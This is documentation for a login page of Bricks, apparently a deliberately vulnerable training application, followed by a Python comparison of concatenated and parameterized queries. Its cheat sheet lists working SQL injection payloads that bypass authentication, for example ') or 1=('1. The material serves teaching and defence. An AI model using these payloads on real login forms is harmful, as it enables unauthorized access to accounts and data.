Bricks Documentation

Login page #3

  • Login page with user name and password verification.
  • Both the user name and password fields are prone to code injection.

Credentials for logging in normally
| User name | Password |
|-----------|----------|
| admin     | admin    |
| tom       | tom      |
| ron       | ron      |

SQL injection.


Executed SQL query when username is tom and password is tom:
SELECT * FROM users WHERE name=('tom') AND password=('tom') LIMIT 0,1

When a user enters a user name and password, a SQL query is built from them and executed against the database to verify them. The above query searches the users table for a row where name is tom and password is tom. If matching entries are found, the user is authenticated.

In order to bypass this security mechanism, SQL code has to be injected into the input fields. The code has to be injected in such a way that the SQL statement still generates a valid result upon execution. If the executed SQL query has syntax errors, it won't fetch a valid result. So filling in random SQL commands and submitting the form will not always result in successful authentication.

Cheat sheet
| User name | Password | SQL Query |
|-----------|----------|-----------|
| tom | tom | SELECT * FROM users WHERE name=('tom') AND password=('tom') LIMIT 0,1 |
| tom | ') or 1=('1 | SELECT * FROM users WHERE name=('tom') AND password=('') OR 1=('1') LIMIT 0,1 |
| tom | ') or 1=(1)-- - | SELECT * FROM users WHERE name=('tom') AND password=('') OR 1=(1)-- -') LIMIT 0,1 |
| ') or 1=('1 | ') or 1=('1 | SELECT * FROM users WHERE name=('') OR 1=('1') AND password=('') OR 1=('1') LIMIT 0,1 |
| ') or 1=('1')-- - | blah | SELECT * FROM users WHERE name=('') OR 1=('1')-- -') and password=('blah') LIMIT 0,1 |
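
Added example (not code from the Bricks project): the page's query built by string concatenation beside the same lookup with bound parameters, run over the cheat sheet inputs. It assumes an in-memory SQLite table standing in for the application's database; SQLite does not evaluate 1=('1') as true, so only the 1=(1) row is expected to get past the concatenated query there. The function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the users table; SQLite replaces the app's database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "admin"), ("tom", "tom"), ("ron", "ron")])
    return db

def login_concatenated(db, name, password):
    # Vulnerable form: input is pasted between ('...') as in the page's query.
    sql = ("SELECT * FROM users WHERE name=('" + name + "') "
           "AND password=('" + password + "') LIMIT 0,1")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a syntax error fetches no result, as the text says

def login_parameterized(db, name, password):
    # Hardened form: placeholders keep input as data, never as SQL text.
    sql = "SELECT * FROM users WHERE name=(?) AND password=(?) LIMIT 0,1"
    return db.execute(sql, (name, password)).fetchone() is not None

# (user name, password) pairs copied from the cheat sheet rows.
CHEAT_SHEET = [
    ("tom", "tom"),
    ("tom", "') or 1=('1"),
    ("tom", "') or 1=(1)-- -"),
    ("') or 1=('1", "') or 1=('1"),
    ("') or 1=('1')-- -", "blah"),
]

def compare(db):
    # Returns (name, password, concatenated_ok, parameterized_ok) per row.
    return [(n, p, login_concatenated(db, n, p), login_parameterized(db, n, p))
            for n, p in CHEAT_SHEET]

if __name__ == "__main__":
    # SQLite does not treat 1=('1') as true, so only the 1=(1) row gets
    # past the concatenated query here; none get past the bound one.
    for row in compare(make_db()):
        print(row)
```

With bound parameters, only the genuine tom/tom pair authenticates; every other cheat sheet row is compared as a literal string and matches nothing.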